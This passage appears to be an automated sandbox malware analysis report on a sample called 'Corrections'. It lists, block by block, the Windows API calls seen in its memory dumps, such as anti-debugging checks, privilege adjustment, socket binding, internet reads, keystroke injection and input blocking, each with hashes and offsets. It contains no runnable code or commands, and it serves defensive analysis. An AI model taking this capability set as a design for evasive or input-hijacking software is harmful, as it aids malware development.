                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0141A37190420AAFDF15DFA8DD49BEEBBB8EF44310F184155F805A2191EB319E44CFA2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DefDlgProcW.USER32(?,?), ref: 0092233E
                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00922421
                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00000000), ref: 00922434
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Color$Proc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 929743424-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 23a890ec1743059375b3fa07da1f99f6bbc06f8debb9e7491cb34a8c33ddf750
                                                                                                                                                                                                                                                                                            • Instruction ID: 71d0af62defc46e7430929a64c60ad0530132c7310e68c1d1c18ba2290f250ba
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23a890ec1743059375b3fa07da1f99f6bbc06f8debb9e7491cb34a8c33ddf750
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C8146B0118120BEE639BB3CAD98FFF255EEB82B10F214609F102C659EC95D9F41D276
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 009A3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009A3AD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 009A3AAB: _wcslen.LIBCMT ref: 009A3AF8
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009A22BA
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A22E1
                                                                                                                                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 009A2338
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 009A2343
                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 009A2372
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0378c6eb9ec50b708821882d71236e41f886c96b51471eb8c3ab1fdc1628d400
                                                                                                                                                                                                                                                                                            • Instruction ID: cb5c7db6fdb7f246c064caef3d98d8e728907bc0fd0974731a0f3236d7e04602
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0378c6eb9ec50b708821882d71236e41f886c96b51471eb8c3ab1fdc1628d400
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA51D471A00210AFEB10EF68D886F2A77E5AB85714F148498F9455F3D3DB74AD41CBE1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 29fcf840695efe50037816a0b04997313e55d02c21c81304977ea6b087d20981
                                                                                                                                                                                                                                                                                            • Instruction ID: 8fc59a77daf80c530030e93fe4bc2bee0f6bd76053a45b7fac288415a6687cc9
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 29fcf840695efe50037816a0b04997313e55d02c21c81304977ea6b087d20981
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E121E0357052119FE7219F26CA84B9A7BE9EF85334F188068E84A8B351DF71FD42CB94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0099D8CE
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0099D92F
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0099D943
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a270d8d1581d94d92ff51b387355cdd65cc067fe13f260023c8e94f9779dc1a
                                                                                                                                                                                                                                                                                            • Instruction ID: 85acff42e84b8a20498dc2063488b1eaf6b8de743b1d28f2c317d7691b9cbb90
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a270d8d1581d94d92ff51b387355cdd65cc067fe13f260023c8e94f9779dc1a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E821AFB5506705EFEB20AF6AC988BAAB7FCEB41324F10442DE64692142E774EE04DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,009646AC), ref: 0098E482
                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0098E491
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0098E4A2
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0098E4AE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 01b6806a8bfdb8bb4a4430e48301c0b27bbd5226a66ab9023946336421d6e51c
                                                                                                                                                                                                                                                                                            • Instruction ID: 9111eabe18868822aa7b535ba4e890b6492073a102a9dfe10ccde3219da39e25
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01b6806a8bfdb8bb4a4430e48301c0b27bbd5226a66ab9023946336421d6e51c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBF0E53042991057D21477BCAD0D8AB776DAE82335B504701F83AC22F0E7BCDD95A7D5
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                                                                            • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                            • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                            • Opcode ID: 1cc03b5ce5e498c6af9d80250b857ea99ab84b33b0b98b7bc7ee1bc61244b8cf
                                                                                                                                                                                                                                                                                            • Instruction ID: bfeaf9b9085edf70bbd4d5d6562ee1cc5708c6611ce3c41e2230d7609746f307
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cc03b5ce5e498c6af9d80250b857ea99ab84b33b0b98b7bc7ee1bc61244b8cf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56D012B2C08108D6CBD097909D48DBA737CAB1C304F10CCA2F90A91040E6389904AB21
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00952A8A
                                                                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00952A94
                                                                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00952AA1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5c78b931b49a181ea3c91dc5e7571c9922a642655e5d4cd6b7b21de995600da0
                                                                                                                                                                                                                                                                                            • Instruction ID: f60db1bcee39b7375e97716c910dd7b64e6b355c61528e5c150f1344b7a1c8ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c78b931b49a181ea3c91dc5e7571c9922a642655e5d4cd6b7b21de995600da0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E231B7759112289BCB21DF64D989B9DBBB8BF48310F5042DAE81CA6291E7309F858F45
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094014B: __CxxThrowException@8.LIBVCRUNTIME ref: 009409D8
                                                                                                                                                                                                                                                                                              • Part of subcall function 0094014B: __CxxThrowException@8.LIBVCRUNTIME ref: 009409F5
                                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0098205A
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00982087
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00982097
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e202c66c84cb61b1df4bca6c999d016f8553ba1745d2c4ec0d0daf51f75d4fef
                                                                                                                                                                                                                                                                                            • Instruction ID: c21e58aa4e53f0e7ad8e217edd931c2840d080b2227d8afc4cabfc2f8485099b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e202c66c84cb61b1df4bca6c999d016f8553ba1745d2c4ec0d0daf51f75d4fef
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9311BFB1414205AFD728AF54DC86E6BB7BCEF48720B20852EE44653251EB70BC41CB20
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002,00000000), ref: 00945079
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0094502E,?,009E98D8,0000000C,00945185,?,00000002,00000000), ref: 00945080
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00945092
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a536ea0ade9d92ef01a052a848c93089dd057c0b65be3ea26924d5f749a7db83
                                                                                                                                                                                                                                                                                            • Instruction ID: 8448d02ce072b8e7a8726aa31fd77c4545c107bf7abe69c84718e98837d2245b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a536ea0ade9d92ef01a052a848c93089dd057c0b65be3ea26924d5f749a7db83
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E08C35016508AFCF216F94CE08E583BADEF50395F024514F8098A133EB35DD42DBC0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0097E664
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                                                                            • String ID: X64
                                                                                                                                                                                                                                                                                            • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                            • Opcode ID: 716f16e4a22e603a9bc39c00dddfa108cce72ec9f3ae5c0bfc0d8aed4d3467cd
                                                                                                                                                                                                                                                                                            • Instruction ID: 7eaed99187b3228fe0a0486cc90d10cc3a9dfb95ef239065bde76b29660096a3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 716f16e4a22e603a9bc39c00dddfa108cce72ec9f3ae5c0bfc0d8aed4d3467cd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BD0C9B581511DEACB80DB50EC88DDA73BCBB08308F104A91F106A2040D73495489F14
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,009A52EE,?,?,00000035,?), ref: 00994229
                                                                                                                                                                                                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,009A52EE,?,?,00000035,?), ref: 00994239
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1dbe37418d2eb1d76790a2bc6b20f1cf92e5cd978c2c0a1376c4529627db0905
                                                                                                                                                                                                                                                                                            • Instruction ID: c933fca2d0c583dece303c190bea39ae2eeabd4cd9113b043f3c844fc0a3a853
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1dbe37418d2eb1d76790a2bc6b20f1cf92e5cd978c2c0a1376c4529627db0905
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF0A0306052256AEB205769AC4DFAF36ADEFC5B71F000275F515D2185D9609A0087B0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0098BC24
                                                                                                                                                                                                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0098BC37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b764f8eef66d8245e4f4389d52345391de9e8c6c291773c76f0ebdabf2429331
                                                                                                                                                                                                                                                                                            • Instruction ID: 6e1867df99463c121736078624e129f45c3ca6af44a09c3614004cb1d086edb4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b764f8eef66d8245e4f4389d52345391de9e8c6c291773c76f0ebdabf2429331
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F0907080424DABDB019FA4C806BFE7FB4FF08319F048419F951A6191D77D8201DF94
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00981B48), ref: 00981A20
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,00981B48), ref: 00981A35
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a8e43a7d62e1e25369d76b05c96891170fd03592e370dfeaad9a961b9db73d46
                                                                                                                                                                                                                                                                                            • Instruction ID: 7d3a59ee86e1116a9c881cbe18cf48572348322244de35370337329accae8f4b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8e43a7d62e1e25369d76b05c96891170fd03592e370dfeaad9a961b9db73d46
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E09A72019610AEE7252B10EC06F7677A9EB48321F14892DB59581471EA726C91EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • BlockInput.USER32(00000001), ref: 0099F51A
